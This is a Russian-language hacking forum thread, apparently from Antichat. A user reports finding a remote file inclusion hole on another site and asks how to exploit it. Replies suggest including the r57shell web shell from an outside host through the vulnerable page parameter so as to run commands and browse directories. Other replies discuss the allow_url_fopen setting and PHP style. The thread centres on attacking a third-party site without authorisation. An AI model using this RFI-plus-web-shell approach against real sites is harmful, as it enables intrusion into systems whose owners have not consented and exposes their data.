На одном из сайтов нашел возможность инклуда файла в параметр страницы page=http://mysite.com/icx и файл icx.php выполнеятся. Что можно с этим сделать? Например использовать shell(я в этом темный, объясните или пошлите куда-то прочитать, что оно есть ... и ссылку откуда скачать можно шелл с манулом ) )Ну или считать содержимое файлов как? Вот таким кодом хочу считать содержимое файла PHP: if (fopen("http://www.somesite.com/main.php", "r")) { echo "I can open it!"; $lines = file("http://www.somesite.com/main.php") foreach ($lines as $line_num => $line) { echo "#<b>{$line_num}</b> : " . htmlspecialchars($line) . "<br />\n"; } Выдает такую ошибку #1 : <b>Fatal error</b>: Call to undefined function: showmain() in <b>/home/somesite/public/main.php</b> on line <b>2</b><br /> //by SMiX: Код php суем в тег PHP: [/b][/size]
иче Распичатой на бумажке с форматом а4 Сходи с ней в туалет ............ потересь ей поймеш какая плохая ошибка
Попробуй page=http://rst.void.ru/download/r57shell.txt? Сможешь выполнять команды, просматривать дирректории... Вобщем, действительно, поищи на ачате, найдешь все, что нужно. Советую посмотреть видео по подобной темматике(VIDEO.ANTICHAT.RU )
А можно весь код посмотреть? ПыСька: В таких случаях не используем двойные кавычки, ибо производительность уменьшается. Двойные кавычки пхп парсит на наличие переменных, а у тебя там переменных нет - медвежий труд.
ну на сколько я помню то функцией fopen() можно открывать только файлы расположенный на том же сайте что и сам файл с функцией....
nc.STRIEM ты не прав. Такое будет только если хостер спецом так настроит php.ini. По умолчанию урлы fopen открывать может.
вот тут меня попросили нормально написать пишу вот из мана { HTTP-соединения являются read-only; вы не можете записывать данные или копировать файлы в HTTP-ресурс. } fopen('http://vasya.narod.ru/file','r') будет открыто соидение http если в php.ini стоит allow_url_fopen=on если что обращаейтесть я уже на пхп не первой год пишу для gadjet если хостер поставил allow_url_fopen=off то если http://rst.void.ru/download/r57shell.txt обрабатываецо фунций fopen то не фига не получитца
